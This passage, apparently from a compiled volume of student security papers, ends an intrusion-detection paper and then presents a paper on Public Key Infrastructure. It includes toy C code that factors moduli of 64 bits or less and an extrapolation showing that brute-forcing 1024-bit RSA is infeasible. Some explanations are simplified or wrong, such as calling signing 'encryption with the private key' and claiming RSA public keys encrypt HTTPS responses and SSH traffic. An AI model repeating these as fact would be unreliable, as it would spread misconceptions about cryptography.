addition, the organization should also include other types of technologies, besides IDPS, to achieve comprehensive security, such as firewall, routers, and even physical border or guards. On the other hand, the cost of each of these IDPS solution is quite high, especially for small to medium businesses. Therefore, implementing redundant and extra protection beyond an organization's needs could also bring many troubles. 280 There's no fast and hard rule, but each organization should carefully balance between their needs and their budget, so that they could achieve the required security level at an affordable cost. 8 Bibliography Charles P. Pfleeger, Shari Lawrence Pfleeger. Security in Computing, Fourth Edition,. Deckerd, G. (2006, November 23). Wireless Attacks from an Intrusion Detection. Hutchison, K. (2004, October 18). Wireless Intrusion Detection Systems. London. Karen Scarfone, Peter Mell. (2007, February). Guide to Intrusion Detection and Prevention Systems (IDPS). Gaithersburg, MD, United States of America: U.S. Department of Commerce. 281 282 Public Key Infrastructure: An exploration into what Public Key Infrastructure is, how it’s implemented, and how the greatest vulnerability of the Public Key Infrastructure has nothing to do with their keys. Laurence Putra Franslay National University of Singapore, School of Computing Singapore [email protected] http://www.geeksphere.net Abstract. This paper aims to introduce the reader to the concept of Public Key Infrastructure. It will explore the various types of Public Key Infrastructures currently in place, as well as how they work. The paper will then move on to specific infrastructures, and discuss the possible threats and vulnerabilities to these Infrastructures. The paper will also explore threats and vulnerabilities that have occurred in the past. 
1 Introduction

The concept of a Public Key Infrastructure is effectively an arrangement of software, hardware, people and policies that certifies a public key to be representative of an identity, which is, most of the time, either a person or a company. [1] This arrangement gives an identity to the person who issues the public key, certifying that he is who he says he is.

2 Background Knowledge

2.1 What exactly is it?

The concept of a Public Key Infrastructure is not new. Before computers, we had passports, which in a sense were the public keys of those of us going abroad; locally, we had identification cards. These public keys (passports and identification cards) were issued by an embassy or a government, which acted as what we now call a Certificate Authority. Hence, as we can see, the notion of a Public Key Infrastructure has existed within society since before computers, and to fully understand Public Key Infrastructure and the security behind it, we have to understand why it has been around, how it affects our lives, and the vulnerabilities found in existing Public Key Infrastructures that are not related to computing. After all, these infrastructures have been around far longer than computers, and hence have experienced more attempts to circumvent them.

2.2 How does the Public Key Infrastructure work?

From this section onwards, most of the terms used describe the sphere of Computer Science, while occasionally drawing on real-world examples. At the center of every Public Key Infrastructure is a Certificate Authority, which issues and verifies digital certificates. How these certificates are generated is very simple and straightforward. First, the owner/server generates his own public/private key pair, for uses such as encrypting traffic on the Secure Sockets Layer, as well as identifying the server as the valid server. [2] After this key pair is generated, the Certificate Authority takes the public key belonging to the owner/server and signs it. The signing process is quite straightforward as well: the Certificate Authority takes the public key of the owner/server, stores it in a file alongside other information identifying the owner (including but not limited to contact information), and encrypts it using its own private key. The certificate, which can then be decrypted using the Certificate Authority's public key, shows that it was indeed signed by the Certificate Authority, and that the connection between the server and the end user is somewhat secure. Figure 1 below is a rough representation of how the Public Key Infrastructure works, and a toy numeric sketch of the sign-and-verify arithmetic follows the figure.

Fig. 1. The role a Certificate Authority plays in the trust chain. [3]
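As a rough illustration of the sign-and-verify arithmetic described in Section 2.2 (and not of any real certificate format such as X.509), the minimal C sketch below "signs" a small stand-in for a message digest by exponentiating it with a private exponent, and verifies it with the matching public exponent. All the numeric values (n = 3233, e = 17, d = 2753, derived from the textbook primes p = 61 and q = 53) are illustrative assumptions, far too small to be secure.

#include <stdio.h>

/* Square-and-multiply modular exponentiation: computes (base^exp) mod m. */
unsigned long long modexp(unsigned long long base, unsigned long long exp,
                          unsigned long long m){
    unsigned long long result = 1;
    base %= m;
    while(exp > 0){
        if(exp & 1)
            result = (result * base) % m;   /* multiply in the current bit */
        base = (base * base) % m;           /* square for the next bit     */
        exp >>= 1;
    }
    return result;
}

int main(){
    /* Toy RSA parameters (from p = 61, q = 53); real keys are 1024+ bits. */
    unsigned long long n = 3233, e = 17, d = 2753;
    unsigned long long digest = 123;                /* stand-in for a hash  */
    unsigned long long sig = modexp(digest, d, n);  /* CA signs with d      */
    unsigned long long check = modexp(sig, e, n);   /* verify with public e */
    printf("digest=%llu signature=%llu recovered=%llu\n", digest, sig, check);
    return 0;
}

Since d and e are inverses modulo φ(n), the recovered value equals the original digest; this is exactly the property a browser relies on when checking a Certificate Authority's signature. In a real PKI, the digest would be a cryptographic hash of the whole certificate body.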
3 Research

In this paper, the main research done was to measure the rate at which RSA key pairs can be cracked, and what that means for the future of RSA encryption, especially in light of the fact that compute clusters can be activated at a moment's notice, and that distributed computing is once again gaining popularity. One approach I use is to estimate what it would take to fully crack a 1024-bit RSA key, in terms of money as well as time and compute power. In addition to that, I will also be looking at other possible attack vectors on the Public Key Infrastructure: how its reliability can be undermined, and how someone can successfully spoof the identity of another.

3.1 RSA and Public Key Infrastructure

What is RSA?
RSA stands for Rivest, Shamir, and Adleman, who described the algorithm for use in public key cryptography. It was the first algorithm suitable for both signing and encrypting data, and was undoubtedly one of the greatest leaps forward in public key cryptography. [4] RSA is, for now, believed to be secure enough given sufficiently long keys, in the range of 1024 to 2048 bits, and it is considered unlikely that such keys will be cracked in the near future.

How does RSA work?
In RSA, both the public key and the private key are generated by the algorithm. The public key is often used to encrypt the data sent over to the server; in this case, data such as the session id of the logged-in user, as well as other information such as the password that the user sends over when logging in. The server then uses its private key to decrypt the data. The keys are generated as follows. First, two large, distinct primes p and q are chosen at random, of similar bit length (i.e. the same number of bits are needed to represent both numbers); for example, a 1024-bit modulus requires two 512-bit primes. The modulus is n = pq. Next, φ(n) = (p − 1)(q − 1) is calculated. Afterwards, an integer e is selected such that 1 < e < φ(n) and gcd(e, φ(n)) = 1; e usually has a short bit length for more efficient encryption, but not so short that it becomes insecure. This e is the public key exponent. The private key exponent d is then calculated such that d ≡ e^(−1) (mod φ(n)), i.e. de ≡ 1 (mod φ(n)), which is most of the time computed using the extended Euclidean algorithm (a toy version of this computation is sketched just before the experimental code below).

How does RSA relate to Public Key Infrastructure?
In most modern Public Key Infrastructures, RSA is used to generate the keys for the encryption/decryption process. For example, when one accesses a website through HTTPS, most of the time the responses that users return to the server are encrypted using the public key. In addition, the signatures that Certificate Authorities place on the certificates that servers use to prove their identity are more often than not produced with RSA as well. Lastly, when we SSH to servers, their RSA-generated public key is used to identify the server, as well as to encrypt the traffic between the server and the client.

3.2 Cracking RSA

Methodology
As described above, the RSA key pair is generated from two large prime numbers, p and q, and to break it one must first find these two numbers; the only way to do so is to factorise n. However, due to the limitations of the C language (no 128/256/512-bit integers) and the lack of a straightforward way to do parallel programming in Python, I cracked 8-bit, 16-bit, 32-bit, 48-bit, 52-bit, 56-bit, 60-bit and 64-bit keys, took the readings, and extrapolated from there. The experiment was done on a 12-core server with 2.5 GHz per core.
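Before the experimental code, here is a minimal sketch of the key-generation arithmetic from Section 3.1, assuming the classic textbook primes p = 61 and q = 53 (values this small are purely illustrative, not secure). It derives the private exponent d from e with the extended Euclidean algorithm, exactly as described above; a real implementation would instead draw p and q from a cryptographically secure prime generator and use a big-integer library.

#include <stdio.h>

/* Extended Euclidean algorithm: returns d such that (d * e) mod phi == 1,
   assuming gcd(e, phi) == 1. */
long long modinv(long long e, long long phi){
    long long old_r = e, r = phi;
    long long old_s = 1, s = 0;
    while(r != 0){
        long long q = old_r / r, tmp;
        tmp = r; r = old_r - q * r; old_r = tmp;
        tmp = s; s = old_s - q * s; old_s = tmp;
    }
    return (old_s % phi + phi) % phi;   /* normalise into [0, phi) */
}

int main(){
    long long p = 61, q = 53;            /* toy primes; real ones are 512+ bits */
    long long n = p * q;                 /* modulus n = pq = 3233               */
    long long phi = (p - 1) * (q - 1);   /* phi(n) = 3120                       */
    long long e = 17;                    /* 1 < e < phi(n), gcd(e, phi(n)) = 1  */
    long long d = modinv(e, phi);        /* d = 2753: 17 * 2753 = 15 * 3120 + 1 */
    printf("n=%lld phi=%lld e=%lld d=%lld\n", n, phi, e, d);
    return 0;
}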
Code to generate prime numbers p and q

/* build (assumed file name): gcc -O2 -fopenmp generate.c -lm -o generate */
#include <stdio.h>
#include <stdlib.h>   /* rand, srand */
#include <time.h>
#include <math.h>

unsigned long long generate(int nbits);
int isPrime(unsigned long long num);
unsigned long long randBits(int nbits);

int main(){
    /* Due to the lack of int128 support in C, the inherent need for
       parallel computing, and the weak support for parallel programming
       in Python, we resort to factorising a maximum of 64 bits. */
    int nbits;
    unsigned long long num1, num2;
    srand(time(NULL));   /* seed once, so the two calls below differ */
    printf("Please enter the number of bits for the final number: ");
    scanf("%d", &nbits);
    num1 = generate(nbits/2);
    num2 = generate(nbits/2);
    printf("Factors: %llu, %llu\n", num1, num2);
    printf("Value: %llu\n", num1 * num2);
    return 0;
}

/* Draw random nbits-bit numbers until one tests prime. */
unsigned long long generate(int nbits){
    unsigned long long num = 4;   /* composite, so the loop always runs */
    while(isPrime(num) == 0){
        num = randBits(nbits);
    }
    return num;
}

/* Parallel trial division up to sqrt(num). There is no early exit,
   because break is not allowed inside an OpenMP parallel for loop. */
int isPrime(unsigned long long num){
    int prime = 1;
    long long root = sqrt(num);
    long long i;
    #pragma omp parallel shared(prime) private(i)
    {
        #pragma omp for schedule(dynamic, 1)
        for(i = 2; i <= root; i++){
            if(num % i == 0){
                prime = 0;
            }
        }
    }
    return prime;
}

/* Random number in [2^(nbits-1), 2^nbits); rand() only yields about 31
   random bits, which is enough for the <= 32-bit primes used here. */
unsigned long long randBits(int nbits){
    unsigned long long min = pow(2, nbits - 1);
    unsigned long long max = pow(2, nbits);
    return rand() % (max - min) + min;
}

Code to crack modulus n

/* build (assumed file name): gcc -O2 -fopenmp crack.c -lm -o crack */
#include <stdio.h>
#include <math.h>

unsigned long long findFactor(unsigned long long num);

int main(){
    /* Subject to the same 64-bit limitation as the generator above. */
    unsigned long long num1, num2, value;
    printf("Please enter the value to crack: ");
    scanf("%llu", &value);
    num1 = findFactor(value);
    num2 = value/num1;
    printf("Factors: %llu, %llu\n", num1, num2);
    printf("Value: %llu\n", value);
    return 0;
}

/* Brute-force search for a non-trivial factor by parallel trial division. */
unsigned long long findFactor(unsigned long long num){
    unsigned long long factor = 0;
    long long root = sqrt(num);
    long long i;
    #pragma omp parallel private(i)
    {
        #pragma omp for schedule(dynamic, 1)
        for(i = 2; i <= root; i++){
            if(num % i == 0){
                factor = i;   /* benign race: any thread finding a factor wins */
            }
        }
    }
    return factor;
}

Results
The figures below show the results of the experiment.

Fig. 2. Time taken to crack the various sized keys
Fig. 3. Average time taken to crack the various sized keys
Fig. 4. Time taken to crack the various sized keys

These results show an exponential growth in the time taken to crack the key as the number of bits grows. For example, when the number of bits increased by 4, from 52 to 56 bits, the time taken to crack the key increased roughly 4 times, and the pattern continued from 56 to 60 bits and from 60 to 64 bits. The readings for 32 bits and below are ignored, as they are all largely similar; the likely cause is that at these sizes the running time is dominated by the overhead of multithreading.

Deductions
From the experiment, we can see an average growth of 4 times in the time taken to crack the key for every increase of the key length by 4 bits. Taking the data collected, the relation between the number of bits x and the time y (in seconds) taken to crack the key is approximately y = 1.128 × 10^(−6) × 1.3956^x. Also, from the data obtained, the sequential running time is approximately 12 times the parallel running time, from which we can deduce that the load is distributed roughly equally between all 12 cores used in the experiment.
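One quick sanity check on this growth pattern (my own arithmetic, not part of the measured data): a fourfold increase in cracking time for every 4 extra bits corresponds to a per-bit growth factor of 4^(1/4) = √2 ≈ 1.414, which agrees reasonably well with the base of 1.3956 in the fitted curve above.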
Given this even load distribution, we can therefore assume that if we scale up to more cores, the time taken to crack the key will divide equally between them.

Conclusion for experiment
Given these results and deductions, we can calculate the time required to crack a 1024-bit key using the elastic compute clusters offered by Amazon Web Services. Using the equation above, cracking a 1024-bit key would require 1.2482 × 10^142 seconds, which works out to 1.4447 × 10^137 days on a single 2.5 GHz core. Assuming a hacker is willing to spend approximately USD$7000 a month to crack the key, he can afford 40 High-CPU Extra Large compute instances. [6] With 8 virtual 2.5 GHz cores per instance, this gives the hacker 320 cores with which to crack the key. Even with this impressive infrastructure behind him, it would still take 1.2369 × 10^132 years to crack it. Hence, as can be seen from the above results, it is highly unlikely that the key can be cracked using brute force [5], a conclusion shared by Bruce Schneier, one of the most respected figures in computer security. From his blog: "We've never factored a 1024-bit number – at least, not outside any secret government agency – and it's likely to require a lot more than 15 million computer years of work. The current factoring record is a 1023-bit number, but it was a special number that's easier to factor than a product-of-two-primes number used in RSA. Breaking that Gpcode key will take a lot more mathematical prowess than you can reasonably expect to find by asking nicely on the Internet. You've got to understand the current best mathematical and computational optimizations of the Number Field Sieve, and cleverly distribute the parts that can be distributed. You can't just post the products and hope for the best." [5]

3.3 Other Attack Vectors

Despite the results above, that is not to say that 1024-bit RSA keys cannot be cracked. In March 2010, a group of researchers managed to break 1024-bit RSA encryption by meddling with the voltage supplied to the CPU. [7] By exploiting this trait of the CPU, the researchers were able to slowly piece together the bits of the private key. Hence, even if RSA itself is secure, by compromising other parts of the system one can remove the security provided by RSA, and with it the whole Public Key Infrastructure. Another instance of an attack that undermined the security of the Public Key Infrastructure was the Comodo hack in March this year. The hacker did not attack the key; instead, he went after the equipment belonging to the Certificate Authority. By exploiting a variety of loopholes, from 0-day vulnerabilities to weaknesses in firewalls, the hacker was able to gain access to the information required to spoof the Certificate Authorities. [8] From these instances, we can see that to exploit the whole Public Key Infrastructure, one does not need to attack the keys: one can instead go after vulnerabilities in other parts of the system to gain access to the keys, and then spoof the Certificate Authorities or commit other acts.

4 Conclusion

From this paper, we can see that Public Key Infrastructures utilizing RSA are still very strong, and the keys themselves are not very prone to attack, due to the large amount of resources required to crack them.
However, at the same time, we can also see that there are many parts to the mechanism behind the Public Key Infrastructure, not just the encryption/decryption keys. In light of the fact that so many different parts support the entire Public Key Infrastructure, every aspect of the infrastructure has to be sturdy for it to be fully secure. Hence, given the recent attacks on these other parts of the infrastructure, more attention needs to be placed on those aspects as well, rather than just on the public and private keys.

References

1. Jim Brayton, Andrea Finneman, Nathan Turajski, Scott Wiltsey: PKI (public key infrastructure). SearchSecurity.com, October 2006. http://searchsecurity.techtarget.com/definition/PKI
2. Song Y. Yan: Cryptanalytic Attacks on RSA.
3. Isode: A Short Tutorial on Distributed PKI. http://www.isode.com/whitepapers/dist-pki-tutorial.html
4. Rivest, R., Shamir, A., Adleman, L.: A Method for Obtaining Digital Signatures and Public-Key Cryptosystems (1978). Communications of the ACM 21(2), 120–126. http://theory.lcs.mit.edu/~rivest/rsapaper.pdf
5. Bruce Schneier: Kaspersky Labs Trying to Crack 1024-bit RSA (June 2008). http://www.schneier.com/blog/archives/2008/06/kaspersky_labs.html
6. Amazon Web Services: Amazon Elastic Compute Cloud (Amazon EC2). https://aws.amazon.com/ec2/#pricing
7. Sean Hollister: 1024-bit RSA encryption cracked by carefully starving CPU of electricity. Engadget, March 2010. http://www.engadget.com/2010/03/09/1024-bit-rsa-encryption-cracked-by-carefully-starving-cpu-of-ele/
8. Peter Bright: Comodo hacker: I hacked DigiNotar too; other CAs breached. Ars Technica, Oct 2011. http://arstechnica.com/security/news/2011/09/comodo-hacker-i-hacked-diginotar-too-other-cas-breached.ars